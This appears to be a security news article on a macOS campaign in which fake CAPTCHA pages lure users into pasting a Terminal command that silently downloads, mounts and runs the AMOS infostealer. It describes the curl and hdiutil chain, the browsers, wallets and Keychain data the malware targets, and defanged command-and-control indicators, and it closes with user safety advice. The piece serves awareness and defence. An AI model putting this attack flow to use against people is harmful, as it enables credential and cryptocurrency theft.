A fresh macOS malware campaign is using fake CAPTCHA pages to trick users into running Terminal commands that silently download, mount, and launch malicious disk images. The payload is Atomic macOS Stealer, or AMOS — an infostealer that grabs browser credentials, crypto wallet data, Keychain contents, messaging app info, and user documents.
Palo Alto Networks Unit 42 first spotted the campaign. Here’s how it works: a victim lands on a page showing what looks like a CAPTCHA verification. The page tells them to open Terminal and paste a command to “verify” themselves. That command uses curl to quietly pull down a DMG file, then macOS’s built-in hdiutil to mount it without showing it in Finder. A script hunts for the first .app or .pkg inside the disk image and launches it.
What makes this campaign stand out is the combination of social engineering and silent execution. Older ClickFix attacks on Mac typically required users to manually open a DMG. This one automates the whole flow from a single Terminal paste.
Once running, AMOS targets eight Chromium-based browsers — Chrome, Edge, Brave, Opera, Arc, Vivaldi, CocCoc, and Yandex — plus Firefox derivatives like LibreWolf, Tor Browser, and Waterfox. It steals cookies, login databases, autofill data, and stored payment cards. The malware also goes after crypto wallets including Exodus, Electrum, Atomic Wallet, Bitcoin Core, and several others.
Perhaps most concerning: the malware replaces legitimate installations of Ledger Live and Trezor Suite with malicious versions, likely to intercept crypto transactions. It also grabs Telegram and Discord data, Apple Notes, Safari cookies, and Keychain files.
The command-and-control servers are at svs-verificationdate[.]beer and 196.251.107[.]171. The campaign was first flagged via a Unit 42 tweet on X.
The takeaway is simple. Never paste Terminal commands from a website, especially ones claiming to be CAPTCHA verifications or browser fixes. If you don’t understand what a command does, don’t run it.
